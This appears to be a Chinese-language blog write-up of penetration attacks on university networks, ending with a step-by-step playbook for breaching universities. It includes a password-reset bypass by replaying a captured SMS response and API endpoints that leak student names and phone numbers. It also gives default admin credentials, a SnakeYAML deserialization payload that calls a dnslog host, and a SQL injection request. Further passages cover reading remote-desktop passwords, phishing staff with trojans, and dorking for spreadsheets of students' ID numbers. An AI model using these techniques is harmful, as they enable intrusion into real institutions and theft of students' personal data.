教育行业渗透打点实战案例分享

找回密码

对于登录账号600030，请进行优化。

使用密码找回功能，并选择密保问题作为找回方式。

选择出生地作为密保问题，并填写高校所在地作为答案。

方可修改密码

通过在图文信息中心验证身份后，即可修改密码以登录OA系统。

在文件中发现包含1400多名学生敏感信息的文档，其中包括手机号码、身份证号码和学号等信息。这些信息可能被用于创建密码本进行对统一身份认证系统进行暴力破解登录，因为默认密码通常是身份证号的后六位。

成功登录部分账户

登录VPN

通过利用MS17010漏洞，内网扫描已获得C段多台主机权限。

钓鱼

利用OA系统的通讯功能，通过散播木马来实施攻击。

获取多台机器的权限。

2、逻辑漏洞修改密码

GitHub密码泄漏

GitHub泄露了学号和密码。

但是账号已被停用了

获取学号手机号

注册网站账户，然后登录。

建议通过以下接口获取用户ID：/User/GetUserListByKeyWord

通过以下接口，可以遍历用户ID并获取任意用户的姓名、手机号、邮箱等敏感信息：

/User/Tip?time61&id=caec35e7-9956-4f68-98bc-e2aee73ebda5&_=1664438691592

此接口支持获取多组学号、姓名和手机号。

修改密码

点击同意门户的忘记密码功能，输入上述接口返回的学号。

输入手机号，点击获取验证码并进行抓包。

记录回包内容

"datas":"{\"sign\":\"407ec6dc275f4766a4525e059a60ca16\"}","code":"0","message":"获取成功"

随意输入验证码，点击“下一步”，并直接返回上述流量包。

页面成功跳转至密码设置界面。

成功

通过其中一个aspx站点的SQL注入攻击，79个应用之一遭受了Shell获取。

3、Github泄漏账号密码

账号密码

1、在GitHub上搜索”学校域名”和”password”，发现了邮箱账号密码。

2、登陆邮箱后，发现了手机号和身份证号。

统一门户

3、可通过手机号加邮箱密码直接登录至统一门户平台。

泛微OA

跳转至泛微OA并上传文件以获取Shell。

4、向日葵密码读取

heapdump文件泄漏

直接下载 heapdump 文件。

提取MySQL的账号和密码。

向日葵密码读取

成功连接到 MySQL 服务器，并执行了 xp_cmdshell 命令。

程序将直接读取 C:\Program Files\Oray\SunLogin\SunloginClient\config.ini 文件，这是向日葵的默认安装配置文件。

fastcode的第一位字母已被去除，其余部分即为本机识别码，而encry_pwd则是加密后的本机验证码。终止生成

成功连接目标主机服务器后，您可以使用GitHub上的解密项目（https://github.com/wafinfo/Sunflower_get_Password）进行解密。

5、若依漏洞GetShell

1、某学院首页

访问/login页面，发现后台为若依框架，直接使用admin/admin@123登录即可进入后台。

定时任务命令执行

在管理员权限下登录后，向定时任务添加以下代码以运行任务：

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["ftp://ceshi.bdtmos.dnslog.cn"] ]] ]');

DNSlog平台已收到请求。

shiro 反序列化漏洞

经工具扫描后，成功将内存马注入系统。

连接内存马

检测到历史入侵迹象，揭示了fscan黑客漏洞扫描工具的存在。

SQL注入

这个SQL注入，当时也没有动手尝试，但我猜想肯定存在。

/system/role/list

/system/role/export

/system/dept/edit

POST /system/role/list HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=e9f143b9-3c3d-4acb-96a4-93c7367a98e9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 75params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

6、FCKeditor上传文件GetShell

1、检测到目录中存在 FCKeditor 文件夹。

2、直接定位上传目录。

3、实施aspx木马文件上传。

成功连接

7、任意文件上传

根据学校名称及域名生成密码字典，以破解admin账号登录。

利用文件上传功能上传任意文件以获取Shell权限。

8、S2反序列化漏洞GetShell

1、目标网站采用S2框架。

2、通过工具直接进行扫描，以获取权限并实施内网渗透。

9、逻辑漏洞

找回密码

某网站的密码找回功能存在漏洞，导致短信验证码直接暴露在响应中。

通过谷歌语法搜索 ‘XX大学’ ‘手机号’ filetype:xls，发现了一些手机号码。

通过找回密码功能重新登录系统后，发现进入了一个学校党务测试系统。

其中存储了上千份真实数据，包括姓名、手机号、学号、身份证等敏感信息。

统一门户

使用学号结合身份证后六位直接登录统一服务平台，以实现登录操作的简化与便捷。

10、geoserver弱口令

成功登录geoserver后台，通过8085端口访问，使用默认账号密码admin/geoserver即可。

获取数据库密码

成功登录后，进入配置页面，点击查看数据存储。

使用F12查看网页源代码，获取PostgreSQL密码。

撞库

同时发现目标IP开启了MySQL数据库，通过root账号和前文获取的密码成功连接。

在其中一个日志表中发现了账号和经过MD5加密的密码。

GetShell

成功登录后台8888端口的登录页，利用数据库中获取的账号密码，进入了一个金碟系统。接着，利用文件上传漏洞成功获取了shell。（由于截图和payload具有敏感性，暂不提供）

总结：

针对高校渗透，以下优化建议可提供：

1. 利用VPN弱口令或GitHub泄漏的学校域名密码，登录8888端口后台登录页。
2. 针对高校站点的特点，尤其是老旧的aspx站点，重点关注SQL注入漏洞，以获取后台权限。
3. 对目标站点进行目录扫描，发现存在各种编辑器漏洞的可能性。尽管一些漏洞可能被伪修复，但通过识别正确的参数名，仍可继续利用，如ueditor的文件上传漏洞。
4. 利用百度和谷歌高级搜索技术，搜索学号文件，多收集账号信息。同时，查找网站使用说明文件，其中可能包含对密码组成的说明，如基于身份证后六位等。据此对管理员账号的密码进行推测。
5. 利用QQ官方群中可能存在的敏感文件，将收集到的信息混入其中，以获取更多渗透机会。

总之，渗透高校系统的关键在于多方面的信息收集，信息收集功夫决定成败。